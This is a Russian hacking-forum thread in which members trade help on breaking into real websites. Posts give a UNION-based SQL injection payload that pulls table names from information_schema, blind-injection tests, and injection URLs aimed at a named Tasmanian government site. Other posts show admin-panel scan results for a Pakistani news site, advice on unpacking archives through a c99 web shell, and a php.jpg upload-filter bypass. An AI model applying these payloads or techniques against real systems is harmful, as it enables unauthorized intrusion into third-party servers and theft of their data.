Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    https://forum.antichat.ru/thread43966.html
     
    2 people like this.
  2. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,184
    Likes Received:
    618
    Reputations:
    690
    2DrakonSerg пробуй варианты с POST запросом или скинь линк на ресурс в ПМ
    если после поиска в урле есть типо такого то...
    приме:
    search.php?go=search&action=se&search=123456789')+union+select+1,2,table_name,4,5,14+from+information_schema.tables+--+
     
    _________________________
    1 person likes this.
  3. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Попробуй влиять на запрос, как при get-запросе.
    Например: при вводе в поле поиска
    Code:
    1
    - получаешь результат "А", при вводе
    Code:
    1+AND+1=1
    - получаешь результат "А", а при вводе
    Code:
    1+AND+1=2
    - получаешь резульата "В".
    Ошибка не является sql-инъекцией, а вот влияние на результат запроса - ДА.
     
  4. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Что-то мне подсказывает, что это joomla ;)
     
  5. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Потому что в joomle во многих случаях используется чистый md5 хешь.
    Я так понимаю доступа к базе нет, соответственно и хешь получить не можешь.
     
  6. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    не видел никояда пасс от бд бил мд5//
     
  7. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Скажите, как быть, если вот такая ошибка:
    Можно ли провести инъекцию в таком случае? Вот линк:
     
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    попробуй):

    Code:
    http://www.bicentenary.tas.gov.au/page.php?id=-66+or+1=1+and+substring(version(),1,1)=3
    
     
    3 people like this.
  9. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    2 CyberHunter

    http://www.bicentenary.tas.gov.au/print.php?id=127+and+substring(version(),1,1)=3
    3 ветка
     
    2 people like this.
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    первый раз встречал,и поэтому не был уверен..а так понял .спс ))
     
    _________________________
  11. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Скажите как открыть архив в с99 шелле?
     
  12. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Я так понимаю ты хочешь его распаковать, а не открыть.

    Зависит от того, какой архив и какая ОС.

    В линуксе так:

    tgz или tar.gz - tar -zxvf < file >
    tar.bz2 - tar -xvfj < file >
    zip - unzip < file >
    rar - unrar x < file >

    В виндовс:

    Ищи директорию с архиватором.
    Для ВинРар:

    > cd C:\Program Files\WinRAR\
    > unrar e < file >
     
    2 people like this.
  13. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Не могу найти админку, сканером только это нашел.

    » http://www.onlinenews.com.pk/Team/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/css/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/img/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/news/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/plesk-stat/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/preview/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/site/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/weather/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/css/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/db/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/favicon.ico HTTP 200 OK
    » http://www.onlinenews.com.pk/images/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/img/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/index.php HTTP 200 OK
    » http://www.onlinenews.com.pk/news/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/picture_library/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/team/ HTTP 403 Forbidden
    » http://www.onlinenews.com.pk/weather/ HTTP 403 Forbidden
     
  14. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Win32,
    Льёшь этот файл http://disk.re4ka.net/files/70985850/pclzip.lib.php на сервер.
    Потом в тойже папке создаёшь файл, unzip.php
    PHP:
    <?php  set_time_limit(0);      $file='file.zip';  require_once('pclzip.lib.php');  $zip = new PclZip($file);  $ext $zip->extract();  if($ext==0)      die("Ошибка! ".$zip->errorInfo(true));  foreach ($ext as $val) {      echo $val['filename']."<br />";  }  echo "<b>Файлы успешно извлечены!!</b>";  ?>
    $file как бы твой zip файл.
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ребят в админке есть место для загрузки картинок,стоит фильтр,не могу загрузить php файл.. переименовал файл в php.jpg ,файл загрузилось,но не интерпретируется..

    есть еще методы обхода фильтрации?
     
    _________________________
  16. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    У меня возле дома стоит автомат по приёму платежей. Он принимает купюры и монеты.

    Я попробывал засунуть туда рулон туалетной бумаги с написанной на ней цифрой 1000 - не сработало. В монетоприёмник засовывал жетоны на метро - не катит, а крышка от колодца туда не полезла :(

    Можно как-то обойти проверку?
     
    2 people like this.
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Jokester вообще то так можно обойти фильтрацию (php.jpg) :)

    если хочешь могу отправить в личку
     
    _________________________
  18. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Если попробовать порезать тысячу на пополам и аккуратно приклеить к двум рулочикам туалетной бумаги может прокатит, и получиться две тысячи. А с жетонами - попробуй им бока подпилить об бордюр , мы так еще в детстве делали, когда автомат принимал 5 рублёвки а мы в него запихивали 50 копеечные ( или рублёвые, не помню :( ) старые со спиленными боками и принимал. Попробуй, если не получиться, то пиши, придумаем еще что-нибудь ;)
     
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Спасибо, я пожалуй воздержусь от такого зрелища.

    Всё зависит от кода и настроек сервака. Да, если админ конченный кретин и у него не зарегистрировано jpg это прокатит, но я таких не видел.
    А при тех условиях что ты дал можно гадать бесконечно и может прокатить любой вариант или не прокатить не один при нормальной реализации проверки
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Я был бы очень рад, если бы ты дал мне совет по этому поводу :)
     
    _________________________
Thread Status:
Not open for further replies.